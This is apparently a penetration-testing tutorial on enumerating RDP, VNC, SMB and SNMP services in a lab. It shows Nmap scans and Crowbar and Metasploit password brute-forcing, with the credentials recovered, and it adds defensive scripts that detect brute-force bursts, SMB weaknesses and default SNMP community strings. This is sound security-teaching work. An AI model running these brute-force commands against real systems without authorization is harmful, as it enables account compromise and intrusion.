In the first part of this advanced enumeration series in Kali Linux, we enumerated and identified FTP, SSH, and Telnet services. In the second part, we covered SMTP, POP3, IMAP4, Microsoft SQL, Oracle Database Server, MySQL, Docker Engine, and Jenkins.
Web Protocols 80/443
Web applications are everywhere these days, which is why a separate chapter is dedicated to identifying and exploiting them. In the previous section, you learned how to use Burp Suite to intercept web requests and how to brute-force a web application login with Hydra. By now, you should have noticed that most web servers use two ports (by default) to serve a web application:
- HTTP, TCP port 80: this port serves web requests and responses in plaintext (cleartext). If you sniff the network traffic of a website served on port 80, you will be able to see credentials in plain text.
- HTTPS, TCP port 443: HTTP carried over TLS is known as HTTPS. Here the communication is encrypted, and a sniffer will not be able to read the traffic unless a proxy intercepts it. Large companies deploy such proxies and install their own certificates on their users' systems so that they can inspect their employees' HTTPS traffic.
Note: Web portals like Jenkins, for example, don't use the default port 80, so that they don't interfere with the default web application hosted on the same web server.
Remote Graphical Access Protocols
Connecting to a remote GUI is easy on both Windows and Linux systems these days. In this section, you'll learn how to identify a remote graphical access service and test it like a pro. These are the most common protocols used for this purpose:
■ Remote Desktop Protocol (RDP): TCP port 3389
■ Virtual Network Computing (VNC): TCP port 5900
RDP (Port 3389)
The Remote Desktop Protocol is the usual way to connect remotely to Windows operating systems. If it is enabled on the remote host, users can connect to the graphical user interface of the Windows host; the RDP server listens on TCP port 3389 for this. Let's quickly scan a host running an RDP server:
root@kali:~# nmap -sV -sC -O -T5 -p 3389 172.16.0.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 10:04 EDT
Nmap scan report for 172.16.0.104
Host is up (0.00056s latency).

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: KCORP
|   NetBIOS_Domain_Name: KCORP
|   NetBIOS_Computer_Name: WINDOWS10LAB
|   DNS_Domain_Name: KCorp.local
|   DNS_Computer_Name: Windows10Lab.KCorp.local
|   DNS_Tree_Name: KCorp.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-06-16T14:04:26+00:00
| ssl-cert: Subject: commonName=Windows10Lab.KCorp.local
[...]
RDP Brute-Force
RDP is a relatively slow protocol, and Hydra does not perform optimally against it. Crowbar, on the other hand, has proven to perform slightly better than Hydra at brute-forcing the RDP service. Let's see a practical example against the same server we identified earlier, this time using Crowbar instead of Hydra (you need to install it first with the command apt install crowbar -y):
root@kali:/# crowbar -b rdp -s 172.16.0.104/32 -u admin -C /root/pass.txt
2020-06-16 14:08:26 START
2020-06-16 14:08:26 Crowbar v0.4.1
2020-06-16 14:08:26 Trying 172.16.0.104:3389
2020-06-16 14:08:26 RDP-SUCCESS : 172.16.0.104:3389 - admin:Password123!
2020-06-16 14:08:26 STOP
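The defender's view of the Crowbar run above is a burst of failed RDP logons from one source, followed by a success. The following script is an added example (not from the original post) that flags such bursts in an exported Windows Security log; the export format (timestamp, event ID, logon type, account, source IP) and the sample records are constructed for this example.

```python
"""Spot RDP password-guessing bursts in Windows Security log records.

Added example, not from the original post. Assumes the Security log has
been exported as one record per line: timestamp, event ID, logon type,
account, source IP. Event 4625 is a failed logon and 4624 a successful
one; logon type 10 (RemoteInteractive) is what an RDP connection produces.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a six-guess burst from one source that ends in a
# successful logon, plus two unrelated failures that must not be flagged.
SAMPLE_LOG = """\
2020-06-16T14:08:20Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:21Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:22Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:23Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:24Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:25Z,4625,10,admin,172.16.0.50
2020-06-16T14:08:26Z,4624,10,admin,172.16.0.50
2020-06-16T14:09:00Z,4625,2,bob,172.16.0.77
2020-06-16T14:20:00Z,4625,10,alice,172.16.0.88
"""

def parse_records(text):
    for line in text.splitlines():
        ts, eid, ltype, user, src = line.split(",")
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), int(eid), int(ltype), user, src

def rdp_bruteforce_sources(text, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: (failures_in_window, later_success)} for every
    source with at least `threshold` failed RDP logons inside `window`."""
    by_src = defaultdict(list)
    for ts, eid, ltype, _user, src in parse_records(text):
        if ltype == 10 and eid in (4624, 4625):   # RDP logons only
            by_src[src].append((ts, eid))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        fails = [ts for ts, eid in events if eid == 4625]
        for i, start in enumerate(fails):          # sliding window over failures
            count = sum(1 for ts in fails[i:] if ts - start <= window)
            if count >= threshold:
                success = any(eid == 4624 and ts > start for ts, eid in events)
                hits[src] = (count, success)
                break
    return hits
```

A burst that ends in a success (the second tuple element) is the case to escalate first, since it matches the RDP-SUCCESS line Crowbar printed.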
VNC (Port 5900)
nmap -sV -T5 -p 5900 --script=vnc* 172.16.0.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 15:14 EDT
Nmap scan report for 172.16.0.101
Host is up (0.00025s latency).

PORT     STATE SERVICE VERSION
5900/tcp open  vnc     VNC (protocol 3.3)
| vnc-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 15 guesses in 1 seconds, average tps: 15.0
|_  ERROR: Too many authentication failures
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    VNC Authentication (2)
[...]
Nmap doesn't show us much here; we were only able to identify the VNC protocol version. To brute-force VNC, we'll be using Metasploit. (In the past, I have had more success with the MSF module than with Hydra.) Note that with classic VNC Authentication (security type 2, as shown above) you don't need a username to log in to a VNC server; all you need is a password:
msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 172.16.0.101
RHOSTS => 172.16.0.101
msf5 auxiliary(scanner/vnc/vnc_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/vnc/vnc_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/vnc/vnc_login) > run

[*] 172.16.0.101:5900 - 172.16.0.101:5900 - Starting VNC login sweep
[+] 172.16.0.101:5900 - 172.16.0.101:5900 - Login Successful: :password
[*] 172.16.0.101:5900 - Scanned 1 of 1 hosts (100% complete)
[...]
File Sharing Protocols
The Server Message Block (SMB) and NetBIOS protocols are the heart of file sharing on Microsoft Windows operating systems. Samba is the open-source implementation of SMB, and you'll often hear the two terms used interchangeably. SMB file and print sharing is not only widely used on Windows, but also on Linux systems, where Samba provides it.
SMB (Port 445)
The SMB protocol works on TCP port 445, and as soon as it's enabled, you'll see that TCP port 139, used by NetBIOS, is open as well. SMB enumeration should look for the following:
- Share names
- User list
- Group list
- Domain name
- Accounts that can be brute-forced
- Vulnerable SMB versions
A quick scan with Nmap should give you basic information about the target host:
root@kali:~# nmap -sV -T5 -p 445 -sC 172.16.0.106
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-18 09:36 EDT
Nmap scan report for 172.16.0.106
Host is up (0.00072s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 10 Pro 10240 microsoft-ds (workgroup: KCORP)
MAC Address: 00:0C:29:87:09:90 (VMware)
Service Info: Host: WINDOWS10LAB02; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: WINDOWS10LAB02, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:87:09:90 (VMware)
| smb-os-discovery:
|   OS: Windows 10 Pro 10240 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Windows10Lab02
|   NetBIOS computer name: WINDOWS10LAB02\x00
|   Domain name: KCorp.local
|   Forest name: KCorp.local
|   FQDN: Windows10Lab02.KCorp.local
|_  System time: 2020-06-18T06:36:19-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-18T13:36:19
|_  start_date: 2020-06-18T13:32:18
Next, we can run a vulnerability scan using the Nmap smb-vuln* scripts to see if we can get more information (I didn't run the full smb* script set, as those scripts are time-consuming and risky):
root@kali:~# nmap -sV -p 445 --script=smb-vuln* 172.16.0.106
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-18 10:27 EDT
Nmap scan report for 172.16.0.106
Host is up (0.00025s latency).

PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: KCORP)
MAC Address: 00:0C:29:87:09:90 (VMware)
Service Info: Host: WINDOWS10LAB02; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds
We will test whether the remote host is actually vulnerable to MS17-010 in a later article; at the moment, we are only collecting information. (These positive results may be false, so don't count on the accuracy of this step.) Note that you can also run the smb-enum* scripts to add more results to the enumeration phase:
root@kali:~# nmap -sV -p 445 --script=smb-enum* 172.16.0.106
If you want to try more tools for this purpose, I suggest you also test the SMB enumeration tool Enum4linux:
$ enum4linux -a [IP address]
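Two lines in the Nmap output above deserve a defender's attention: "message_signing: disabled (dangerous, but default)" and the MS17-010 result. The following script is an added example (not from the original post) that parses the text form of those host-script results and turns them into prioritized hardening findings; the sample is a constructed excerpt of the output shown above.

```python
"""Triage Nmap SMB host-script output for hardening findings.

Added example, not part of the original post. Parses the text layout Nmap
prints for smb-security-mode, smb2-security-mode and smb-vuln-ms17-010.
"""
import re

# Constructed sample: the relevant host-script lines, in Nmap's own layout.
NMAP_OUTPUT = """\
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

def parse_scripts(text):
    """Split host-script output into {script_name: [body lines]}.
    A script header is '| name:' with exactly one space after the bar;
    deeper-indented 'WORD:' lines (like 'VULNERABLE:') belong to the body."""
    scripts, current = {}, None
    for raw in text.splitlines():
        body = raw.lstrip("|_ ").rstrip()
        is_header = raw.startswith("| ") and not raw.startswith("|  ")
        if is_header and re.fullmatch(r"[\w-]+:", body):
            current = body[:-1]
            scripts[current] = []
        elif current:
            scripts[current].append(body)
    return scripts

def smb_findings(text):
    """Return hardening findings, most severe first."""
    s = {k: "\n".join(v) for k, v in parse_scripts(text).items()}
    findings = []
    vuln = s.get("smb-vuln-ms17-010", "")
    if "State: VULNERABLE" in vuln:
        cve = re.search(r"CVE:(CVE-\d{4}-\d+)", vuln)
        ident = cve.group(1) if cve else "MS17-010"
        findings.append(f"{ident}: SMBv1 RCE; patch the host and disable SMBv1")
    if "message_signing: disabled" in s.get("smb-security-mode", ""):
        findings.append("SMB1 message signing disabled; require signing")
    if "enabled but not required" in s.get("smb2-security-mode", ""):
        findings.append("SMB2 signing enabled but not required; require signing")
    return findings
```

Feed it the "Host script results" block of a real scan and the unpatched SMBv1 host surfaces first; the signing findings also explain why Nmap labels the default as dangerous.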
Brute-Forcing SMB
We can use the smb_login auxiliary module in Metasploit for the SMB protocol instead of Hydra, as this module produces fewer false positives and performs better. To get the desired result, you can adjust the scanner options to avoid wasteful consumption of resources. (The option names are self-explanatory.)
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 172.16.0.106
RHOSTS => 172.16.0.106
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser admin
SMBUser => admin
msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/smb/smb_login) > set THREADS 100
THREADS => 100
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/smb/smb_login) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 172.16.0.106:445 - 172.16.0.106:445 - Success: '.\admin:admin'
[*] 172.16.0.106:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
SNMP (Port UDP 161)
Simple Network Management Protocol (SNMP) is a protocol for collecting information from network devices and hosts for network management purposes. The database that holds this information is known as the Management Information Base (MIB), which organizes the data into a tree. The server listens on UDP port 161 to expose this information. Older versions of SNMP (1, 2, and 2c) do not encrypt their traffic, so with a sniffing tool we can see credentials in clear text. The SNMP server uses a community string as the password that protects access to its data. The following three community strings are the common defaults used to connect to an SNMP server:
■ public
■ private
■ manager
SNMP Enumeration
If you can enumerate the SNMP server, you can get a lot of information about the target host:
- Network Interfaces
- Listening ports
- System Processes
- Host Hardware Information
- Installed Software
- Local Users
- Shared Folders
This information can be used to plan further attacks or to gather useful data for analyzing vulnerabilities in the target system. Nmap is my favorite tool for the identification process, so for SNMP I'll use Nmap again to get the job done. Note that I'm using the -sU option because my target is a UDP port (the results will be plentiful, so I'll shorten some of the output):
root@kali:~# nmap -sU -p 161 -sV -sC -T5 172.16.0.100
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-05 12:39 EST
Nmap scan report for 172.16.0.100
Host is up (0.00038s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
| snmp-interfaces:
|   Software Loopback Interface 1\x00
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 1 Gbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   WAN Miniport (SSTP)\x00
|     Type: tunnel  Speed: 1 Gbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
[...]
| snmp-netstat:
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:3389         0.0.0.0:0
|   TCP  0.0.0.0:49152        0.0.0.0:0
[...]
| snmp-processes:
|   1:
|     Name: System Idle Process
|   4:
|     Name: System
|   264:
|     Name: smss.exe
|     Path: \SystemRoot\System32\
|   356:
|     Name: csrss.exe
|     Path: %SystemRoot%\system32\
|     Params: ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:User
[...]
Nmap did a fantastic job of showing all the information. In fact, the output is so long that it would take several pages, so I omitted most of it for clarity. The most important part of the Nmap output is the SNMP server version (v1) together with the community string in use (public). This tells you which version of SNMP is running and that the server's data is protected only by a community string called "public". The "public" community string is the common default in SNMP versions 1 and 2c for accessing public information, and this can be very useful for an intrusion.
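The reason "public" is visible to Nmap (and to any sniffer) is that a v1/v2c message carries the community string unencrypted in its first few bytes. The following script is an added example (not from the original post) of a passive check a network monitor can run on UDP/161 payloads: it decodes the BER header of each message and flags v1/v2c traffic that still uses a default community string. The sample packet is constructed for this example.

```python
"""Flag SNMPv1/v2c messages that carry a default community string.

Added example, not from the original post. Every SNMPv1/v2c message is a
BER SEQUENCE { INTEGER version, OCTET STRING community, PDU } sent in
cleartext, so a passive monitor on UDP/161 can read the community from
the header. Version numbering on the wire: 0 = v1, 1 = v2c, 3 = v3.
"""
DEFAULT_COMMUNITIES = {"public", "private", "manager"}

def _tlv(buf, pos):
    """Decode one BER tag/length/value at pos; return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                 # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def snmp_header(payload):
    """Return (version, community); community is None for SNMPv3,
    whose header holds msgGlobalData instead of a community string."""
    tag, msg, _ = _tlv(payload, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message: outer SEQUENCE missing")
    tag, ver, pos = _tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    version = int.from_bytes(ver, "big")
    if version == 3:
        return version, None
    tag, community, _ = _tlv(msg, pos)
    if tag != 0x04:
        raise ValueError("community OCTET STRING missing")
    return version, community.decode("latin-1")

def is_default_community(payload):
    """True when a v1/v2c message uses one of the well-known default strings."""
    version, community = snmp_header(payload)
    return version in (0, 1) and community in DEFAULT_COMMUNITIES

# Constructed sample: SNMPv1 GetRequest for sysDescr.0 with community "public".
SAMPLE_V1_GET = bytes.fromhex(
    "302902010004067075626c6963a01c020401020304020100020100"
    "300e300c06082b060102010101000500"
)
```

On a real sensor, feed each UDP/161 payload to is_default_community and alert on the source; the fix on the device side is to move to SNMPv3 or at least replace the default strings.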
Summary
I hope you enjoyed this chapter on service identification. At this stage of the penetration test, we collect all the information we can about the different types of services. All the identified data will be used when exploiting each of these services individually. In the next chapter, you'll learn how to exploit these services to obtain a remote shell (and much more).